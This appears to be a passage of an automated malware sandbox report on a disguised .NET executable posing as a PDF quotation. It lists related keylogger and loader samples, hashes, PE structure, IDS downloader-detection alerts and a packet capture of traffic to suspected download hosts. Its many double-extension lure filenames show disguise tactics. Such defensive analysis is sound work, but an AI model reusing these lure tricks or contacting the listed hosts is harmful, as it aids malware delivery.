	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm	Get hash	malicious	BlackHacker JS Obfuscator	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
ORACLE-BMC-31898US	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	193.122.130.0
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=Sep	Get hash	malicious	Unknown	Browse	147.154.51.84
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	New_Order_PO-NG57283H9.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	z1MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Benefit Enrollment -16oy1xb.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	STAFF RECORD_pdf.arj.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	MV BBG MUARA Ship's Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	PO#83298373729383838392387373873PDF.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	CONTRACT COPY PRN00720387_pdf.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	https://bitly.cx/aMW9O9	Get hash	malicious	Unknown	Browse	188.114.96.3
	Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO-841122676_g787.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.2964051773154184
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
File size:	413'696 bytes
MD5:	c62fb9bd9189ed019db81d5cec1ee11b
SHA1:	1eda85cc204de90b33edddb1d8dfdf59a3dae847
SHA256:	9c891264b004f469657e84658ba1d82d2365d9a76cfe7e18cefb2a8e0ccdb1a3
SHA512:	99d1691a5c87237bc6faafe3ffd2f6a7e45c65805d5f527db62d4c3da0e4255c9924a1b47ecde11aff00f8dfbbf89de43f81ce650dbce114cf38bf437455be83
SSDEEP:	1536:/v12J7YRB+RdtZTQj+AcC0VFQVQsjY30+NNU3PDQ7qPpqOLy0uyL+f1:129seA1Y3h6EYuyA
TLSH:	4494941932B49636DE09CAB454F14D10D7E7AE582BE2D35A29C4B66D2F323BD4F036C2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g.........."......2............... ....@...... ....................................`...@......@............... .....

File Icon


Icon Hash:	0e3333b0bbb3b035

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673EE4A5 [Thu Nov 21 07:43:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x51a46	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x130ac	0x13200	0159f8cdf79fe6ab36bd0fac791a95f6	False	0.42980238970588236	data	5.831334411535666	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x51a46	0x51c00	2842f76719f4e687f2fd793537f0b08e	False	0.07124725248470948	data	2.3501488134684356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x16370	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	0.7601351351351351
RT_ICON	0x16498	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832	0.7155963302752294
RT_ICON	0x16800	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6826241134751773
RT_ICON	0x16c68	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	0.5389784946236559
RT_ICON	0x16f50	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200	0.470679012345679
RT_ICON	0x17bf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4378517823639775
RT_ICON	0x18ca0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	0.36402439024390243
RT_ICON	0x19308	0x1ca8	Device independent bitmap graphic, 48 x 96 x 24, image size 7296	0.33110687022900764
RT_ICON	0x1afb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.30881742738589213
RT_ICON	0x1d558	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2560	0.2924174174174174
RT_ICON	0x1dfc0	0x3228	Device independent bitmap graphic, 64 x 128 x 24, image size 12800	0.26580996884735203
RT_ICON	0x211e8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	0.24244213509683515
RT_ICON	0x25410	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	0.014139568600763382
RT_GROUP_ICON	0x67438	0xbc	data	0.5797872340425532
RT_VERSION	0x674f4	0x368	data	0.41628440366972475
RT_MANIFEST	0x6785c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T13:08:58.651241+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49806	193.122.130.0	80	TCP
2024-11-21T13:09:02.088850+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49806	193.122.130.0	80	TCP
2024-11-21T13:09:03.727519+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49822	188.114.97.3	443	TCP
2024-11-21T13:09:05.088823+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49825	193.122.130.0	80	TCP
2024-11-21T13:09:06.755451+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49829	188.114.97.3	443	TCP
2024-11-21T13:09:18.683967+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49862	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 13:07:59.616573095 CET	49704	80	192.168.2.5	188.114.96.3
Nov 21, 2024 13:07:59.736200094 CET	80	49704	188.114.96.3	192.168.2.5
Nov 21, 2024 13:07:59.736305952 CET	49704	80	192.168.2.5	188.114.96.3
Nov 21, 2024 13:07:59.739715099 CET	49704	80	192.168.2.5	188.114.96.3
Nov 21, 2024 13:07:59.859311104 CET	80	49704	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:01.047128916 CET	80	49704	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:01.069900990 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:01.069946051 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:01.070028067 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:01.088766098 CET	49704	80	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:01.105720043 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:01.105756998 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:02.382292032 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:02.382426977 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:02.387835979 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:02.387846947 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:02.388240099 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:02.432487965 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:02.457309961 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:02.503328085 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:03.267797947 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:03.268065929 CET	443	49705	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:03.268141985 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:03.284890890 CET	49705	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:03.537864923 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:03.537902117 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:03.537975073 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:03.538969994 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:03.538988113 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:04.850578070 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:04.850769997 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:04.853363037 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:04.853379965 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:04.853863955 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:04.855014086 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:04.895337105 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050370932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050434113 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050472975 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050528049 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050575018 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050610065 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.050621986 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.050677061 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.058423042 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.066791058 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.066884041 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.066891909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.075216055 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.075290918 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.075299025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.120012999 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.169919014 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.213756084 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.213768959 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.260643959 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.260665894 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.264731884 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.264816999 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.264827013 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.276245117 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.276313066 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.276345968 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.276355028 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.276401997 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.284781933 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.293068886 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.293134928 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.293143988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.301487923 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.301551104 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.301558971 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.310031891 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.310132980 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.310142994 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.316855907 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.316955090 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.316963911 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.323873043 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.323950052 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.323959112 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.337829113 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.337951899 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.337973118 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.337985039 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.338032961 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.344890118 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.351900101 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.351977110 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.351988077 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.401283026 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.470983982 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.474404097 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.474488974 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.474502087 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.479260921 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.479373932 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.479381084 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.484278917 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.484353065 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.484360933 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.484411955 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.493704081 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.493711948 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.493783951 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.503009081 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.503015995 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.503103971 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.512425900 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.512434006 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.512509108 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.517250061 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.517322063 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.526722908 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.526803017 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.531409025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.531476974 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.540847063 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.540924072 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.550220966 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.550304890 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.559607029 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.559675932 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.564477921 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.564543962 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.573944092 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.574067116 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.683240891 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.683341026 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.688262939 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.688344955 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.691852093 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.691935062 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.698822975 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.698900938 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.705488920 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.705549002 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.712096930 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.712165117 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.716248989 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.716326952 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.722117901 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.722193003 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.728616953 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.728679895 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.735198021 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.735266924 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.738507986 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.738559961 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.745135069 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.745198011 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.748469114 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.748543024 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.755152941 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.755232096 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.761676073 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.761738062 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.766727924 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.766813993 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.773267984 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.773335934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.779817104 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.779875994 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.783097982 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.783149004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.789845943 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.789901972 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.793194056 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.793283939 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.892349958 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.892468929 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.893753052 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.893817902 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.899797916 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.899861097 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.905998945 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.906054974 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.911937952 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.912004948 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.915038109 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.915095091 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.921139956 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.921195984 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.937835932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.937844992 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.937901020 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.937925100 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.937932014 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.937951088 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.937988043 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.948729992 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.948769093 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.948828936 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.948828936 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.948834896 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.948872089 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.963973045 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.963995934 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.964076042 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.964085102 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.964126110 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.978230000 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.978245974 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.978344917 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.978355885 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.978394985 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.993465900 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.993479967 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.993596077 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:10.993618011 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:10.993659973 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.008776903 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.008790016 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.008860111 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.008871078 CET	443	49706	188.114.96.3	192.168.2.5
Nov 21, 2024 13:08:11.008904934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 21, 2024 13:08:11.108006001 CET	443	49706	188.114.96.3	192.168.2.5
